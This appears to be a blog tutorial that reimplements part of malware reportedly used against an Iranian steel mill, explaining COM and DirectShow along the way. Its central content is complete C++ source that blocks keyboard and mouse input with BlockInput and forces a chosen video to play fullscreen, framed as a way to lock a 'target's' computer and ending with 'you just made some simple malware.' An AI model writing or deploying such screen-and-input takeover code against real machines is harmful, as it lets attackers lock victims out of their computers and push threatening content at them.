Forcing A Video Takeover of Your Target's Desktop Using the Filter Graph COM Object

Do you like locking people's computers? How about forcing them to watch whatever video you please? Well, do I have a program for you.

It's been quite a while since I last posted. Much like Batman returning from training under Ra's al Ghul at the Monastery home of the League of Shadows, I've been working on some of the dark arts. Welcome to the incredibly masochistic world of COM Programming.

https://twitter.com/GonjeshkeDarand/status/1541288345183158272?s=20&t=RqOnOPEmID18F3TzPF7cRQ

Last week this pretty dope malware absolutely trashed an Iranian steel mill, so I grabbed some of the DFIR reports to find out exactly what it did. Then I picked out the interesting parts and decided to reimplement some of them.

Turns out the writers have been using the Filter Graph COM object to display a video that describes the other targets they messed up in their campaign and threatens that more targets are coming. Let me present exhibit A:

Exhibit A

Before we jump into the code, let's talk about the basics of COM.

COM stands for Component Object Model and is mostly credited to three Microsoft architects who didn't believe Object Oriented Programming (OOP) was being used correctly. Without debating whether OOP is being used correctly throughout the industry, COM is a sort of plug-in style architecture for APIs that gives you a malleable approach to building systems and applications. Unfortunately, the learning curve is steep and resources for learning COM are few and far between, which means you better be a masochist on the keys, because Windows is heavily built on top of it. You should probably wait until you're at least a little bit comfortable with C++ and the WinAPI before attempting it.

Welcome to COM hell

On to the technical side. If you don't like the nitty gritty, Computer Science-y technical details, you should exit stage right. From MSDN, "The Microsoft DirectShow application programming interface (API) is a media-streaming architecture for Microsoft Windows." Within this API exists the Filter Graph object which contains all of our video rendering interfaces and methods that we need.

Lingo bingo detour from MSDN:

In COM, an object is the overarching body that contains interfaces for communicating with the object and methods that further define those interfaces. "An interface is a contract that consists of a group of function prototypes." Methods provide the definitions for these prototypes. In summation, one application can talk to multiple different objects (like the Filter Graph for video rendering, or WMI instances) through whichever interfaces are active within the current context of our application.
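If the object/interface split still feels abstract, here is a rough, portable sketch of the idea. It is not real COM: IUnknownLike, IPlayer, IWindow, MediaObject, CreateMediaObject and RunDemo are all names I made up, and plain strings stand in for the GUIDs that real COM uses to identify interfaces. What it does show is the contract: one object, several interfaces, QueryInterface to hop between them, and reference counting to decide when the object dies.

```cpp
#include <cassert>
#include <cstring>

// Hypothetical stand-in for IUnknown. Real COM uses GUIDs, not strings.
struct IUnknownLike {
    virtual ~IUnknownLike() = default;
    virtual bool QueryInterface(const char* iid, void** out) = 0;
    virtual unsigned long AddRef() = 0;
    virtual unsigned long Release() = 0;
};

// Two made-up interfaces: each is only a group of function prototypes.
struct IPlayer : IUnknownLike { virtual bool Play() = 0; };
struct IWindow : IUnknownLike {
    virtual void SetFullScreen(bool on) = 0;
    virtual bool IsFullScreen() const = 0;
};

int g_liveObjects = 0; // counts objects that have not been destroyed yet

// One object that provides the method definitions for both interfaces.
class MediaObject : public IPlayer, public IWindow {
    unsigned long refs_ = 1; // the creator owns the first reference
    bool fullScreen_ = false;
public:
    MediaObject() { ++g_liveObjects; }
    ~MediaObject() override { --g_liveObjects; }

    bool QueryInterface(const char* iid, void** out) override {
        if (std::strcmp(iid, "IPlayer") == 0)      *out = static_cast<IPlayer*>(this);
        else if (std::strcmp(iid, "IWindow") == 0) *out = static_cast<IWindow*>(this);
        else { *out = nullptr; return false; }
        AddRef(); // every interface pointer handed out holds a reference
        return true;
    }
    unsigned long AddRef() override { return ++refs_; }
    unsigned long Release() override {
        assert(refs_ > 0);
        unsigned long remaining = --refs_;
        if (remaining == 0) delete this; // last reference gone
        return remaining;
    }
    bool Play() override { return true; }
    void SetFullScreen(bool on) override { fullScreen_ = on; }
    bool IsFullScreen() const override { return fullScreen_; }
};

// Plays the role CoCreateInstance plays in real COM.
IPlayer* CreateMediaObject() { return new MediaObject(); }

// Walks the same create / query / use / release cycle as the real code.
bool RunDemo() {
    IPlayer* player = CreateMediaObject();
    void* raw = nullptr;
    if (!player->QueryInterface("IWindow", &raw)) { player->Release(); return false; }
    IWindow* window = static_cast<IWindow*>(raw);
    window->SetFullScreen(true);
    bool ok = player->Play() && window->IsFullScreen();
    window->Release();
    player->Release(); // the object deletes itself here
    return ok && g_liveObjects == 0;
}
```

Forget a Release and the object leaks; call one too many and you are poking freed memory. That bookkeeping is most of what makes COM feel painful.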

Now to the code:

#include <dshow.h>
#include <iostream>
#include <Windows.h>

#pragma comment (lib, "Strmiids.lib")

// Release a COM interface pointer if it is set, then clear it.
template <class T> void SafeRelease(T** pp)
{
	if (*pp)
	{
		(*pp)->Release();
		*pp = NULL;
	}
}

HRESULT playMedia(const wchar_t* file)
{
	IGraphBuilder* pGraph = NULL;   // Filter Graph Manager
	IMediaControl* pControl = NULL; // Starts and stops the graph
	IMediaEvent* pEvent = NULL;     // Receives graph events
	IVideoWindow* pWindow = NULL;   // Controls the video window
	LONG evCode = 0;

	HRESULT hr = CoInitialize(NULL); // Initialize the COM library
	if (FAILED(hr))
	{
		OutputDebugStringW(L"[-] Error initializing COM\n");
		return hr;
	}

	// Create the Filter Graph Manager
	hr = CoCreateInstance(CLSID_FilterGraph, NULL, CLSCTX_INPROC_SERVER,
		IID_IGraphBuilder, (void**)&pGraph);
	if (FAILED(hr))
	{
		OutputDebugStringW(L"[-] Error creating the filter graph\n");
		goto cleanup;
	}

	// Media control interface for running the graph
	hr = pGraph->QueryInterface(IID_IMediaControl, (void**)&pControl);
	if (FAILED(hr))
	{
		OutputDebugStringW(L"[-] Error in pControl\n");
		goto cleanup;
	}

	// Media event interface for waiting on playback
	hr = pGraph->QueryInterface(IID_IMediaEvent, (void**)&pEvent);
	if (FAILED(hr))
	{
		OutputDebugStringW(L"[-] Error in MediaEvent\n");
		goto cleanup;
	}

	// Build a filter graph that can play the file
	hr = pGraph->RenderFile(file, NULL);
	if (FAILED(hr))
	{
		OutputDebugStringW(L"[-] Error in Rendering file\n");
		goto cleanup;
	}

	// Video window interface for going fullscreen
	hr = pGraph->QueryInterface(IID_IVideoWindow, (void**)&pWindow);
	if (FAILED(hr))
	{
		OutputDebugStringW(L"[-] Error in VideoWindow\n");
		goto cleanup;
	}

	hr = pWindow->put_FullScreenMode(OATRUE);
	if (FAILED(hr))
	{
		OutputDebugStringW(L"[-] Error in FullScreenMode\n");
		goto cleanup;
	}

	hr = pControl->Run();
	if (FAILED(hr))
	{
		OutputDebugStringW(L"[-] Error in Run\n");
		goto cleanup;
	}

	// Block until playback completes
	hr = pEvent->WaitForCompletion(INFINITE, &evCode);

cleanup:
	// Release whatever was acquired, on success and failure alike
	SafeRelease(&pWindow);
	SafeRelease(&pControl);
	SafeRelease(&pEvent);
	SafeRelease(&pGraph);
	CoUninitialize();
	return hr; // S_OK on success, otherwise the first failure code
}

BOOL toggleKeyboard(BOOL toggle)
{
	BOOL bResult = FALSE;
	if (TRUE == toggle)
	{//Block input
		if (0 != BlockInput(TRUE))
			bResult = TRUE;
	}
	else
	{//Enable input
		if (0 != BlockInput(FALSE))
			bResult = TRUE;
	}
	return bResult;
}

int wmain(int argc, wchar_t* argv[])
{
	if (argc < 2)
	{
		OutputDebugStringW(L"[-] Expected the path to a media file\n");
		return 1;
	}

	HRESULT hrRet = S_OK;
	BOOL bRet = FALSE;
	wchar_t* video = argv[1];

	bRet = toggleKeyboard(TRUE);
	if (FALSE == bRet)
	{
		OutputDebugStringW(L"[-] Failed to toggle peripherals\n");
	}

	hrRet = playMedia(video);
	if (FAILED(hrRet))
	{
		OutputDebugStringW(L"[-] Failed to Stream images\n");
	}
	
	bRet = toggleKeyboard(FALSE);
	if (FALSE == bRet)
	{
		OutputDebugStringW(L"[-] Failed to toggle peripherals\n");
	}

	return 0;
}

This implementation is pretty straightforward, so I'm sure the actual malware did some more funky stuff, like switching over to a screensaver to lock the computer and then disabling CTRL+ALT+DELETE with a kernel driver that hooks the syscall for it or something.

Initially, I blocked all keyboard and mouse input from user mode. It locks all input except for major system interrupts, specifically CTRL+ALT+DELETE. Whatever, we need a failsafe anyway because hard rebooting my machine due to my own stupidity isn't on the agenda today, Satan.

How The 

DirectShow is built out of filters, each of which performs one operation on a multimedia stream. The image above shows our goal of streaming a video from the hard drive to our visual and audio peripherals.
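To make the filter idea concrete, here is a toy model of a graph as a straight chain of stages. Everything in it (Filter, SourceFilter, DecoderFilter, RendererFilter, FilterGraph, RenderFileSketch) is a hypothetical name of mine, and strings stand in for media samples. Real DirectShow graphs connect filters through pins and usually branch into separate audio and video paths, so treat this as a sketch of the concept only.

```cpp
#include <cassert>
#include <memory>
#include <string>
#include <utility>
#include <vector>

// One processing stage; a hypothetical stand-in for a DirectShow filter.
struct Filter {
    virtual ~Filter() = default;
    virtual std::string Process(const std::string& sample) = 0;
};

// Pretends to read raw bytes from a file on disk.
struct SourceFilter : Filter {
    std::string Process(const std::string& path) override {
        return "bytes(" + path + ")";
    }
};

// Pretends to decode raw bytes into video frames.
struct DecoderFilter : Filter {
    std::string Process(const std::string& bytes) override {
        return "frames(" + bytes + ")";
    }
};

// Pretends to draw decoded frames on the screen.
struct RendererFilter : Filter {
    std::string Process(const std::string& frames) override {
        return "screen(" + frames + ")";
    }
};

// Owns the filters and pushes a sample through them in order.
class FilterGraph {
    std::vector<std::unique_ptr<Filter>> filters_;
public:
    void Add(std::unique_ptr<Filter> filter) {
        assert(filter != nullptr);
        filters_.push_back(std::move(filter));
    }
    std::string Run(std::string sample) const {
        for (const auto& filter : filters_)
            sample = filter->Process(sample);
        return sample;
    }
};

// Roughly the job RenderFile does for us: pick the stages and wire them up.
std::string RenderFileSketch(const std::string& path) {
    FilterGraph graph;
    graph.Add(std::make_unique<SourceFilter>());
    graph.Add(std::make_unique<DecoderFilter>());
    graph.Add(std::make_unique<RendererFilter>());
    return graph.Run(path);
}
```

Calling RenderFileSketch("clip.avi") returns "screen(frames(bytes(clip.avi)))", which is the source, decode, render order the Filter Graph Manager works out for you when you hand it a file.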

To start, we declare all our interface pointers. After creating an instance of the Filter Graph object, we call the QueryInterface method to point those variables at the interfaces we need. I didn't do anything with the media events beyond waiting for playback to finish, but you can use them to handle different situations, like a fatal error or another process attempting to remotely shut down the process. Then RenderFile builds the filter graph needed to play the video. As far as supported file formats go, check out this page. I got away with using a .gif. Pretty sure the malware uses an .MP4.

Then I threw it into fullscreen mode using put_FullScreenMode(OATRUE) on the IVideoWindow interface, to make it seem like it wasn't closeable and to block out anything else on the screen. Call Run on the media control to wrap it all up and we're good to go.

You, yes you, just did that

Congrats, you just made some simple malware.

https://docs.microsoft.com/en-us/windows/win32/com/interfaces-and-interface-implementations

https://docs.microsoft.com/en-us/windows/win32/directshow/filter-graph-manager

https://docs.microsoft.com/en-us/windows/win32/directshow/using-windowless-mode

https://docs.microsoft.com/en-us/windows/win32/directshow/introduction-to-directshow-application-programming